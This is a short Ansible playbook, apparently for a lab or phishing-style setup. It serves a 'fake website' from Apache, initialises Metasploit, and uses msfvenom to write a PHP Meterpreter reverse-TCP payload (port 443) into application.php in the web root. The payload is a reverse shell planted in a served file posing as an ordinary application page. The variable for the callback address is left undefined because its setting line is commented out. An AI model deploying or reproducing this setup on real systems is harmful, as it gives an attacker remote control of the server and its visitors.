#################################################
# Setup fake website
#################################################

- name: Transfer template over
  copy:
    src: files/html
    dest: /var/www/
#    mode: '0755'

- name: start apache2 
  command: service apache2 start

#################################################
# Setup Exploit
#################################################

# - name: Set up IP as a variable
#  command: IP="$(hostname -I | cut -f1 -d' ')"

- name: Initialize metasploit framework
  command: sudo msfdb init

- name: Create the msfvenom exploit
  command: sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=$IP LPORT=443 >> /var/www/html/application.php   

- name: restart apache2 service
  command: sudo service apache2 start    